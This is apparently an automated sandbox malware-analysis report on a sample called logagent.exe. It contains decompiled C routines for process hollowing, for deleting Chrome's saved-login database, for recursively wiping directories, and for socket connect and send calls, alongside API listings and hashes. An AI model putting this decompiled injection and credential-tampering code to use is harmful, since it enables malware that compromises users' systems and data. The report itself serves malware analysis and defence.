                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 004128DF
                                    • Part of subcall function 00412881: ??3@YAXPAX@Z.MSVCRT ref: 004128E6
                                    • Part of subcall function 00412881: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128F3
                                    • Part of subcall function 00412881: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00415774), ref: 004128FC
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$?c_str@?$basic_string@D@std@@$??1?$basic_string@$D@2@@std@@$??0?$basic_string@$??8std@@D@2@@0@G@1@@V?$basic_string@$??2@??3@?length@?$basic_string@DownloadExecuteFileShellV01@@free
                                  • String ID: C:\Windows\SysWOW64\logagent.exe$open
                                  • API String ID: 2294739476-468372309
                                  • Opcode ID: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction ID: 66a65e8c2e1efbdbe9726922674a8fee4e6f9857a913e182205edf5cab11bea9
                                  • Opcode Fuzzy Hash: 42ab186bf3551cf1ece3d2000f359e8f0d8a6d5920ef7b9f3b3147624c97a7a2
                                  • Instruction Fuzzy Hash: BE416C7290011CABCB05ABE0EC999EE7778BB54355F44487AF912F30E1EE785A44CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 00410153
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000001,6DF55DF0), ref: 0041016E
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 0041017F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000001), ref: 0041018F
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 0041019F
                                  • StrToIntA.SHLWAPI(00000000), ref: 004101A6
                                    • Part of subcall function 0040F5F4: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040F622
                                    • Part of subcall function 0040F5F4: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041C0C8), ref: 0040F65F
                                    • Part of subcall function 0040F5F4: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?), ref: 0040F91A
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004101CC
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000002), ref: 004101DA
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000003), ref: 004101ED
                                  • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000004), ref: 00410200
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410347
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00410350
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$A?$basic_string@$??1?$basic_string@$??0?$basic_string@?size@?$basic_string@?substr@?$basic_string@V01@@V12@
                                  • String ID:
                                  • API String ID: 1196022968-0
                                  • Opcode ID: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction ID: 7272514a8ba1597b194ef94dbad827cdd9e8fa084c1de8a91cbb274806fefa0c
                                  • Opcode Fuzzy Hash: 6ca50eb3e5ada92066c2d8b5a863bff046788870a4ac603b3f307b788a69b09c
                                  • Instruction Fuzzy Hash: C9614976840208EFCF01DFE4DC88AED7B75BB19300F0081A6E516A72B1DB785A99CF19
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00000000), ref: 0040333B
                                  • FindFirstFileW.KERNEL32(00000000,?,?,00000000), ref: 00403342
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,00000000), ref: 00403379
                                  • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?,00415898,?,?,00000000), ref: 00403392
                                  • ??9std@@YA_NABV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@PBG@Z.MSVCP60(00000000,?,?,00000000), ref: 00403399
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 004033A6
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 004033C4
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004033CE
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004033D7
                                  • FindNextFileW.KERNEL32(?,?), ref: 004033ED
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000250,?), ref: 00403402
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,?,00000000), ref: 00403411
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 0040341D
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00403426
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040342F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 0040344A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000050), ref: 0040345F
                                  • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(00000054), ref: 00403468
                                    • Part of subcall function 00412855: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412860
                                    • Part of subcall function 00412855: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 0041286C
                                    • Part of subcall function 00412855: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040CBF0,?,0041BA28,0041B310,?), ref: 00412876
                                    • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                    • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??0?$basic_string@??1?$basic_string@G@std@@$G@2@@std@@$D@1@@V01@@$??4?$basic_string@?c_str@?$basic_string@FileFindV01@V?$basic_string@$??9std@@?length@?$basic_string@D@2@@0@FirstG@1@@G@2@@0@Hstd@@NextV10@0@
                                  • String ID:
                                  • API String ID: 3638635289-0
                                  • Opcode ID: 638da8c0f9d30b32452b2205bb7f10aace560869c675dcdd44485086082e4fb7
                                  • Instruction ID: 5773dbc557d9876992c7e48c4d97bf12bb9d98964626974f027bca1071927927
                                  • Opcode Fuzzy Hash: 638da8c0f9d30b32452b2205bb7f10aace560869c675dcdd44485086082e4fb7
                                  • Instruction Fuzzy Hash: E641FB7290050DEBCB04ABA0DC49DEEBB7CEB94355F404166F512E30A0EF745689CB64
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 90%
                                  			E0040F219() {
                                  				void* _t59;
                                  				void* _t60;
                                  				void _t71;
                                  				void* _t72;
                                  				signed int _t74;
                                  				CONTEXT* _t80;
                                  				intOrPtr _t85;
                                  				intOrPtr* _t93;
                                  				signed int _t95;
                                  				void* _t100;
                                  				CONTEXT* _t110;
                                  				struct _PROCESS_INFORMATION* _t114;
                                  				void* _t115;
                                  				void* _t117;
                                  
                                  				L00413ECA();
                                  				 *((intOrPtr*)(_t115 - 0x10)) = _t117 - 0x70;
                                  				 *(_t115 - 4) =  *(_t115 - 4) & 0x00000000;
                                  				 *((intOrPtr*)(_t115 - 0x78)) = GetProcAddress(GetModuleHandleA("ntdll.dll"), "NtUnmapViewOfSection");
                                  				_t59 =  *(_t115 + 0xc);
                                  				 *(_t115 - 0x74) = _t59;
                                  				if( *_t59 != 0x5a4d) {
                                  					L16:
                                  					 *(_t115 - 4) =  *(_t115 - 4) | 0xffffffff;
                                  					_t60 = 0;
                                  				} else {
                                  					_t93 =  *((intOrPtr*)(_t59 + 0x3c)) + _t59;
                                  					 *((intOrPtr*)(_t115 - 0x18)) = _t93;
                                  					if( *_t93 != 0x4550) {
                                  						goto L16;
                                  					} else {
                                  						_t95 = 0x11;
                                  						memset(_t115 - 0x60, 0, _t95 << 2);
                                  						_t114 =  *(_t115 + 0x10);
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  						asm("stosd");
                                  						if(CreateProcessW(0,  *(_t115 + 8), 0, 0, 0, 4, 0, 0, _t115 - 0x60, _t114) == 0) {
                                  							goto L16;
                                  						} else {
                                  							_t110 = VirtualAlloc(0, 4, 0x1000, 4);
                                  							 *(_t115 - 0x70) = _t110;
                                  							_t110->ContextFlags = 0x10007;
                                  							if(GetThreadContext(_t114->hThread, _t110) == 0 || ReadProcessMemory(_t114->hProcess, _t110->Ebx + 8, _t115 - 0x1c, 4, 0) == 0) {
                                  								goto L16;
                                  							} else {
                                  								_t71 =  *(_t115 - 0x1c);
                                  								if(_t71 ==  *(_t93 + 0x34)) {
                                  									 *((intOrPtr*)(_t115 - 0x78))(_t114->hProcess, _t71);
                                  								}
                                  								_t72 = VirtualAllocEx(_t114->hProcess,  *(_t93 + 0x34),  *(_t93 + 0x50), 0x3000, 0x40);
                                  								 *(_t115 - 0x6c) = _t72;
                                  								if(_t72 == 0 || WriteProcessMemory(_t114->hProcess, _t72,  *(_t115 + 0xc),  *(_t93 + 0x54), 0) == 0) {
                                  									goto L16;
                                  								} else {
                                  									_t74 = 0;
                                  									 *(_t115 - 0x64) = 0;
                                  									while(_t74 < ( *(_t93 + 6) & 0x0000ffff)) {
                                  										_t100 =  *(_t115 + 0xc);
                                  										_t85 =  *((intOrPtr*)(_t100 + 0x3c)) + (_t74 + _t74 * 4) * 8 + _t100 + 0xf8;
                                  										 *((intOrPtr*)(_t115 - 0x68)) = _t85;
                                  										WriteProcessMemory(_t114->hProcess,  *((intOrPtr*)(_t85 + 0xc)) +  *(_t115 - 0x6c),  *((intOrPtr*)(_t85 + 0x14)) + _t100,  *(_t85 + 0x10), 0);
                                  										 *(_t115 - 0x64) =  *(_t115 - 0x64) + 1;
                                  										_t74 =  *(_t115 - 0x64);
                                  									}
                                  									if(WriteProcessMemory( *_t114,  *(_t115 - 0x70)->Ebx + 8, _t93 + 0x34, 4, 0) == 0) {
                                  										goto L16;
                                  									} else {
                                  										_t80 =  *(_t115 - 0x70);
                                  										_t80->Eax =  *((intOrPtr*)(_t93 + 0x28)) +  *(_t115 - 0x6c);
                                  										if(SetThreadContext(_t114->hThread, _t80) == 0 || ResumeThread(_t114->hThread) == 0xffffffff) {
                                  											goto L16;
                                  										} else {
                                  											_t60 = 1;
                                  										}
                                  									}
                                  								}
                                  							}
                                  						}
                                  					}
                                  				}
                                  				 *[fs:0x0] =  *((intOrPtr*)(_t115 - 0xc));
                                  				return _t60;
                                  			}


                                  APIs
                                  • _EH_prolog.MSVCRT ref: 0040F21E
                                  • GetModuleHandleA.KERNEL32(ntdll.dll,NtUnmapViewOfSection,?,00000000,7620F560), ref: 0040F23A
                                  • GetProcAddress.KERNEL32(00000000), ref: 0040F241
                                  • CreateProcessW.KERNEL32 ref: 0040F294
                                  • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004,?,00000000,7620F560), ref: 0040F2AC
                                  • GetThreadContext.KERNEL32(?,00000000,?,00000000,7620F560), ref: 0040F2C1
                                  • ReadProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,7620F560), ref: 0040F2E3
                                  • VirtualAllocEx.KERNEL32(?,?,?,00003000,00000040,?,00000000,7620F560), ref: 0040F30E
                                  • WriteProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,00000000,7620F560), ref: 0040F330
                                  • WriteProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,7620F560), ref: 0040F371
                                  • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000,?,00000000,7620F560), ref: 0040F392
                                  • SetThreadContext.KERNEL32(?,?,?,00000000,7620F560), ref: 0040F3AB
                                  • ResumeThread.KERNEL32(?,?,00000000,7620F560), ref: 0040F3B8
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Process$Memory$ThreadWrite$AllocContextVirtual$AddressCreateH_prologHandleModuleProcReadResume
                                  • String ID: NtUnmapViewOfSection$ntdll.dll
                                  • API String ID: 65594003-1050664331
                                  • Opcode ID: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction ID: 14082434b540fb9a952e0d1072ae94245c422bc39d8110babfce67740ad62d51
                                  • Opcode Fuzzy Hash: 312b707a27dd8bcb1a4e909d494afcf009e2eee7a57a0b06384939ffbc38e31b
                                  • Instruction Fuzzy Hash: 0E513A71A00204EFDB219F64CC85FAABBB9FF84710F20407AE914EB2A1D775E815CB58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 32%
                                  			E0040710F() {
                                  				char _v5;
                                  				char _v6;
                                  				char _v24;
                                  				void* _v40;
                                  				char* _t12;
                                  				CHAR* _t13;
                                  				long _t20;
                                  				char* _t21;
                                  				void* _t25;
                                  
                                  				_t12 = getenv("UserProfile");
                                  				__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t12,  &_v5, "\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Login Data");
                                  				_t13 =  &_v24;
                                  				L00414170();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ(_t13, _t12);
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ();
                                  				if(DeleteFileA(_t13) != 0) {
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z( &_v6);
                                  					E00407A90("\n[Chrome StoredLogins found, cleared!]");
                                  					_t25 = 1;
                                  					L8:
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return _t25;
                                  				}
                                  				_t20 = GetLastError();
                                  				if(_t20 == 0) {
                                  					_t21 =  &_v6;
                                  					L5:
                                  					__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z(_t21);
                                  					E00407A90("\n[Chrome StoredLogins not found]");
                                  					__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					return 1;
                                  				}
                                  				if(_t20 == 1) {
                                  					_t21 =  &_v5;
                                  					goto L5;
                                  				}
                                  				_t25 = 0;
                                  				goto L8;
                                  			}

                                  APIs
                                  • getenv.MSVCRT ref: 00407124
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00000000), ref: 0040712F
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000), ref: 0040713A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00407145
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 0040714E
                                  • DeleteFileA.KERNEL32(00000000), ref: 00407155
                                  • GetLastError.KERNEL32 ref: 0040715F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins not found],00000000), ref: 0040717E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040718F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([Chrome StoredLogins found, cleared!],00000000), ref: 004071B1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004071C4
                                  Strings
                                  • [Chrome StoredLogins not found], xrefs: 00407179
                                  • \AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 00407119
                                  • UserProfile, xrefs: 0040711F
                                  • [Chrome StoredLogins found, cleared!], xrefs: 004071AC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??0?$basic_string@??1?$basic_string@D@1@@$?c_str@?$basic_string@D@2@@0@DeleteErrorFileHstd@@LastV10@V?$basic_string@getenv
                                  • String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
                                  • API String ID: 3740952235-1062637481
                                  • Opcode ID: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction ID: 31ca8e98cb087ed4ee3b22d3c36486bbccf77f9584d8598ce9e7038f5dc1f740
                                  • Opcode Fuzzy Hash: 14abc8a0a64898b0e6148fec52b2315570b0cd587dd224fa0db585d81b73ae0c
                                  • Instruction Fuzzy Hash: 51118475904509EBCB00BBE0ED4E9FE7738DA547417504036E812E32E1EA796A45CBAA
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 100%
                                  			E00412BEE(wchar_t* _a4) {
                                  				signed char _v5;
                                  				void* _v12;
                                  				short _v532;
                                  				long _v1052;
                                  				struct _WIN32_FIND_DATAW _v1644;
                                  				void* _t46;
                                  
                                  				wcscpy( &_v1052, _a4);
                                  				wcscat( &_v1052, L"\\*");
                                  				wcscpy( &_v532, _a4);
                                  				wcscat( &_v532, "\\");
                                  				_t46 = FindFirstFileW( &_v1052,  &_v1644);
                                  				_v12 = _t46;
                                  				if(_t46 == 0xffffffff) {
                                  					L18:
                                  					return 0;
                                  				}
                                  				wcscpy( &_v1052,  &_v532);
                                  				_v5 = 1;
                                  				do {
                                  					if(FindNextFileW(_v12,  &_v1644) == 0) {
                                  						if(GetLastError() != 0x12) {
                                  							L17:
                                  							FindClose(_v12);
                                  							goto L18;
                                  						}
                                  						_v5 = _v5 & 0x00000000;
                                  						goto L14;
                                  					}
                                  					if(E00412BBA( &(_v1644.cFileName)) != 0) {
                                  						goto L14;
                                  					}
                                  					wcscat( &_v532,  &(_v1644.cFileName));
                                  					if((_v1644.dwFileAttributes & 0x00000010) == 0) {
                                  						if((_v1644.dwFileAttributes & 0x00000001) != 0) {
                                  							SetFileAttributesW( &_v532, 0x80);
                                  						}
                                  						if(DeleteFileW( &_v532) == 0) {
                                  							goto L17;
                                  						} else {
                                  							L7:
                                  							wcscpy( &_v532,  &_v1052);
                                  							goto L14;
                                  						}
                                  					}
                                  					if(E00412BEE( &_v532) == 0) {
                                  						goto L17;
                                  					}
                                  					RemoveDirectoryW( &_v532);
                                  					goto L7;
                                  					L14:
                                  				} while (_v5 != 0);
                                  				FindClose(_v12);
                                  				return RemoveDirectoryW(_a4);
                                  			}

                                  APIs
                                  • wcscpy.MSVCRT ref: 00412C0A
                                  • wcscat.MSVCRT ref: 00412C1E
                                  • wcscpy.MSVCRT ref: 00412C2A
                                  • wcscat.MSVCRT ref: 00412C38
                                  • FindFirstFileW.KERNEL32(?,?), ref: 00412C4B
                                  • wcscpy.MSVCRT ref: 00412C6B
                                  • FindNextFileW.KERNEL32(004085F5,?), ref: 00412C83
                                  • wcscat.MSVCRT ref: 00412CB4
                                  • wcscpy.MSVCRT ref: 00412CE9
                                  • SetFileAttributesW.KERNEL32(?,00000080), ref: 00412D04
                                  • DeleteFileW.KERNEL32(?), ref: 00412D11
                                    • Part of subcall function 00412BEE: RemoveDirectoryW.KERNEL32(?), ref: 00412CD9
                                  • GetLastError.KERNEL32 ref: 00412D1D
                                  • FindClose.KERNEL32(004085F5), ref: 00412D39
                                  • RemoveDirectoryW.KERNEL32(004085F5), ref: 00412D42
                                  • FindClose.KERNEL32(004085F5), ref: 00412D4C
                                    • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BCC
                                    • Part of subcall function 00412BBA: wcscmp.MSVCRT ref: 00412BDC
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.532672625.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.532934609.000000000041D000.00000040.00001000.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_400000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: FileFindwcscpy$wcscat$CloseDirectoryRemovewcscmp$AttributesDeleteErrorFirstLastNext
                                  • String ID:
                                  • API String ID: 520940213-0
                                  • Opcode ID: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                  • Instruction ID: fb5d4b3d5d58ecc2c3d6dfc175ce5965a41efe56bc0731aa74bc7a01e785bf8c
                                  • Opcode Fuzzy Hash: 478ef376a42dd57bdfe1c9928a2704afada4e3ce62e72bb6f7890d5e37a58212
                                  • Instruction Fuzzy Hash: BE415E72C0421CAADF21DBA0DD88FDE7BBDAF44304F1445A6E504E2050EBB59AD5CF58
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  APIs
                                  • _EH_prolog.MSVCRT ref: 10546112
                                  • socket.WS2_32(00000000,00000001,00000006), ref: 10546142
                                  • connect.WS2_32(00000000,0041B320,00000010), ref: 10546151
                                  • _CxxThrowException.MSVCRT(00000001,00416FB8), ref: 105461CA
                                    • Part of subcall function 10546599: FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 10546606
                                    • Part of subcall function 10546599: FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 1054662C
                                  • FindFirstFileW.KERNEL32(00000000,?,?,?), ref: 10546223
                                  • _CxxThrowException.MSVCRT(00000002,00416FB8), ref: 10546277
                                  • FindNextFileW.KERNEL32(000000FF,?,?,?,?), ref: 10546286
                                  • _CxxThrowException.MSVCRT(00000003,00416FB8), ref: 10546374
                                  • _CxxThrowException.MSVCRT(00000004,00416FB8), ref: 105464AB
                                  • FindClose.KERNEL32(000000FF,?,?,?), ref: 105464C8
                                  • atoi.MSVCRT ref: 10546517
                                    • Part of subcall function 10546836: _EH_prolog.MSVCRT ref: 1054683B
                                    • Part of subcall function 10546836: closesocket.WS2_32(?), ref: 1054687D
                                    • Part of subcall function 10546836: TerminateThread.KERNEL32(?,00000000,?,00000000,?,?,?,?,10546580,00000000), ref: 1054688F
                                  • _CxxThrowException.MSVCRT(00000000,00000000), ref: 10546565
                                  • atoi.MSVCRT ref: 10546574
                                  • FindClose.KERNEL32(?), ref: 10546585
                                  • RtlExitUserThread.NTDLL(00000000), ref: 1054658D
                                    • Part of subcall function 10543DCF: send.WS2_32(?,00000000), ref: 10543E4A
                                  Memory Dump Source
                                  • Source File: 00000003.00000002.534117821.0000000010540000.00000040.00000400.00020000.00000000.sdmp, Offset: 10540000, based on PE: true
• Associated: 00000003.00000002.534181517.0000000010563000.00000040.00000400.00020000.00000000.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_3_2_10540000_logagent.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Find$ExceptionThrow$File$CloseFirstH_prologNextThreadatoi$ExitTerminateUserclosesocketconnectsendsocket
                                  • String ID:
                                  • API String ID: 1127153023-0
                                  • Opcode ID: f34def9d141907588ea012b1c6e0d4593feafa86c72f5945ab42735965801bbf
                                  • Instruction ID: 74c968ac219699bbca7d43f094faffe43e401ff7f65ab68f003b7b506960aadc
                                  • Opcode Fuzzy Hash: f34def9d141907588ea012b1c6e0d4593feafa86c72f5945ab42735965801bbf
                                  • Instruction Fuzzy Hash: F5C15072900619DBDB11EBA0DC9DADE7B7CEB84245F1041A6F506E30A0EB716B88CF54
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 57%
                                  			E105555CE(void* __ecx, struct HWND__* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                                  				struct tagPOINT _v12;
                                  				void* _t16;
                                  				struct HMENU__* _t17;
                                  				void* _t20;
                                  				void* _t24;
                                  
                                  				_t16 = _a8 - 1;
                                  				if(_t16 == 0) {
                                  					_t17 = CreatePopupMenu();
                                  					 *0x41c1f0 = _t17;
                                  					AppendMenuA(_t17, 0, 0, 0x416e0c);
                                  					L15:
                                  					return 0;
                                  				}
                                  				_t20 = _t16 - 0x110;
                                  				if(_t20 == 0) {
                                  					if(_a12 != 0) {
                                  						goto L15;
                                  					}
                                  					 *0x415428(2, 0x41c200);
                                  					ExitProcess(0);
                                  				}
                                  				if(_t20 == 0x2f0) {
                                  					_t24 = _a16 - 0x201;
                                  					if(_t24 == 0) {
                                  						if(IsWindowVisible( *0x41c1fc) == 0) {
                                  							ShowWindow( *0x41c1fc, 9);
                                  							SetForegroundWindow( *0x41c1fc);
                                  						} else {
                                  							ShowWindow( *0x41c1fc, 0);
                                  						}
                                  						goto L15;
                                  					}
                                  					if(_t24 == 3) {
                                  						GetCursorPos( &_v12);
                                  						SetForegroundWindow(_a4);
                                  						TrackPopupMenu( *0x41c1f0, 0, _v12, _v12.y, 0, _a4, 0);
                                  						goto L15;
                                  					}
                                  					_push(_a16);
                                  					_push(_a12);
